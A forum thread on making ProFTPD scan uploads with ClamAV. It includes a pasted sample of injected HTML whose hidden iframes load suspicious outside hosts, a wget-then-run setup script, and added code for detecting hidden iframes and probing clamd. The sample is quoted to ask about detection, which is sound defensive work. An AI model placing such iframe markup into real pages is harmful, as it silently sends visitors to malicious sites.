HOWTO: ProFTPD Antivirus using CLAMAV

All ok but how about this code

<html>
<head>
<title>Redirecting...</title>
<meta http-equiv="Refresh" content="0;url=../" />
</head>
<body><iframe src="http://hugepremium.cn:8080/ts/in.cgi?pepsi5" width=2 height=4 style="visibility: hidden"></iframe>
<a href="../">MyBBoard</a>
</body>
</html><iframe src="http://quoasty.com/?click=C2858B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://durnosy.com/?click=73CE2D" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://internetcountercheck.com/?click=21704531" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>


How can I get clamAV to download the URLs and scan them too?
server:~# clamscan --phishing-sigs=yes --phishing-cloak=yes --scan-html=yes --phishing-scan-urls=yes /var/www/html/test.html
/var/www/html/test.html: OK

----------- SCAN SUMMARY -----------
Known viruses: 549711
Engine version: 0.95.1
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 1.112 sec (0 m 1 s)

I have also scanned this code with http://www.virustotal.com/pl/analisis/74c5d4c71f57775f6575023d27b669a1
So clamav does not recognize this file as a virus :(
 
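The file posted above carries no payload of its own, only hidden iframes that pull content from other hosts, so a structural check can flag it even when signature scanning reports OK. The following is an added example, not part of the original thread and not ClamAV functionality: `audit_html`, `IframeAudit` and the `MAX_PX` threshold are hypothetical names and values, and the sample input is constructed with placeholder hosts.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
MAX_PX = 4  # assumption: frames no larger than this are effectively invisible

class IframeAudit(HTMLParser):
    """Collect iframes that load an external URL while being hidden."""
    def __init__(self):
        super().__init__()
        self.after_html_close = False
        self.findings = []

    def handle_endtag(self, tag):
        if tag == "html":
            self.after_html_close = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = urlparse(a.get("src", "")).hostname
        if not host:
            return  # relative or empty src: same-site content, not flagged
        reasons = []
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden-by-css")
        dims = (a.get("width", ""), a.get("height", ""))
        if all(d.isdigit() and int(d) <= MAX_PX for d in dims):
            reasons.append("tiny-frame")
        if self.after_html_close:
            reasons.append("after-</html>")  # markup appended past the document end
        if reasons:
            self.findings.append((host, reasons))

def audit_html(text):
    parser = IframeAudit()
    parser.feed(text)
    parser.close()
    return parser.findings

# Constructed sample shaped like the posted file; hosts are placeholders.
SAMPLE = """<html><head><title>Redirecting...</title></head>
<body><iframe src="http://a.example.test:8080/x" width=2 height=4 style="visibility: hidden"></iframe>
<iframe src="/local/frame.html" width=400 height=300></iframe>
</body></html><iframe src="http://b.example.test/?c=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>"""

if __name__ == "__main__":
    print(audit_html(SAMPLE))
```

Run over a web root, any hit is a reason to inspect the file and to find out how it was modified, independently of what the scanner says.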
Hi pioklo

Would you mind starting a new topic as this is related to the implementation of mod_clamav with ProFTPd rather than Apache to which you're referring.

Some users could get confused with the snippets of information being posted from two separate software packages.
 
Brightlayer, I guess pioklo is trying to say that when he uploads a .html file containing this code, the clamav-activated proftpd is not deleting it.
He also pointed out that this code is only recognized as a virus by 9 out of 39 antivirus software.

Anyway, in this case, pioklo, what I suggest is to submit this code to clamav. I don't know how to do this but I think you can find some info at the www.clamav.net address.
 
Ah, I found it:

http://www.clamav.net/sendvirus/

>> Our virus database is kept up to date with the help of the community.
Whenever you find a new virus which is not detected by ClamAV you should fill the form below.

Our team of sigmakers will review your submission and if necessary update the database. <<
 
Proftpd Directory

Hi,

I have one question: my proftpd conf directory is not /etc/, it uses /etc/proftpd/proftpd.conf (don't know why), and I saw this message when updating proftpd with ftpantivirus.

configure: error: source file './modules/mod_clamav.c' cannot be found -- aborting
cp: cannot stat `/etc/proftpd.conf': No such file or directory
make: *** No targets specified and no makefile found. Stop.
make: *** No rule to make target `install'. Stop.
Can't open /etc/proftpd.conf: No such file or directory.
./ftpantivirus: line 25: /etc/rc.d/init.d/proftpd: No such file or directory
- ProFTPD Version 1.3.0


ProFtp update done

So can anybody help with this?

Danijel,
Thanks in advance
 
Hi,

I will try this on a fresh Debian box without installing directadmin, so I'll let you know if it works.

Danijel,
 
This works:
Code:
<IfModule mod_clamav.c>
   ClamAV on
   ClamServer localhost
   ClamPort 3310
   ClamMaxSize 5 Mb
</IfModule>

If not, try this:
Code:
<IfModule mod_clamav.c>
   ClamAV on
   ClamServer 127.0.0.1
   ClamPort 3310
   ClamMaxSize 5 Mb
</IfModule>

This reply from user email.

Wael
 
Hi,

I fixed the issue that I had; now proftpd is compiled with mod_clamav, but it is not working. I checked for open ports and there is no open port 3310. I even changed to another port, but it doesn't want to bind clamav. What might be the problem and how can I check it?

Danijel,
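One way to check the `ClamServer`/`ClamPort` pair from the configuration above is to send clamd a `PING` on every address the server name resolves to, which also shows why `localhost` and `127.0.0.1` can behave differently. This is an added example, not part of the original thread or of mod_clamav; `probe_clamd` is a hypothetical helper name.

```python
import socket

def probe_clamd(host, port=3310, timeout=3.0):
    """PING clamd on every address `host` resolves to; return [(addr, status)]."""
    results = []
    try:
        infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror as exc:
        return [(host, f"resolve-failed: {exc}")]
    for family, socktype, proto, _, sockaddr in infos:
        addr = sockaddr[0]
        try:
            with socket.socket(family, socktype, proto) as s:
                s.settimeout(timeout)
                s.connect(sockaddr)
                s.sendall(b"zPING\0")   # 'z' prefix: NUL-terminated clamd command
                reply = s.recv(64)
            if reply.rstrip(b"\0\n") == b"PONG":
                status = "PONG"         # clamd is answering on this address
            else:
                status = f"unexpected: {reply!r}"
        except ConnectionRefusedError:
            status = "refused"          # nothing is listening on this address/port
        except socket.timeout:
            status = "timeout"          # filtered, or the listener is not answering
        except OSError as exc:
            status = f"error: {exc}"
        results.append((addr, status))
    return results

if __name__ == "__main__":
    for name in ("localhost", "127.0.0.1"):
        for addr, status in probe_clamd(name):
            print(f"{name} -> {addr}:3310 {status}")
```

A `refused` result on every address usually means clamd has no TCP listener: it only opens one when `clamd.conf` sets `TCPSocket` (and optionally `TCPAddr`), and many packages ship with `LocalSocket` only.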
 
Hi,

I found the issue: I edited the wrong proftpd.conf, so now it is fine :) Working for me. Great tool.

If anybody needs help with Debian, post here.

Danijel,
Thanks in advance
 
I have now written a script to carry out the steps required to set up the scanning of FTP files via ClamAV.

This is supported for CentOS and Directadmin currently.

Code:
wget http://src.brightlayer.net/secureftp.sh
chmod +x secureftp.sh
./secureftp.sh do CLAMAV
./secureftp.sh do PROFTPD

Please note that I do not officially support this script, it's just that I've written it into a bash script and it has been proven to work on my servers, please use with care, I do not accept liability for any damage done to your servers by running this script.
 
Hello. Where can I find:

Command: STOR eicar_com.zip
Response: 150 Opening BINARY mode data connection for eicar_com.zip
Response: 550 Virus Detected and Removed: Eicar-Test-Signature
Status: Retrieving directory listing...

I can't find anything like this after uploading that file in these files:
/var/log/proftpd/access.log
/var/log/proftpd/auth.log
/var/log/messages
 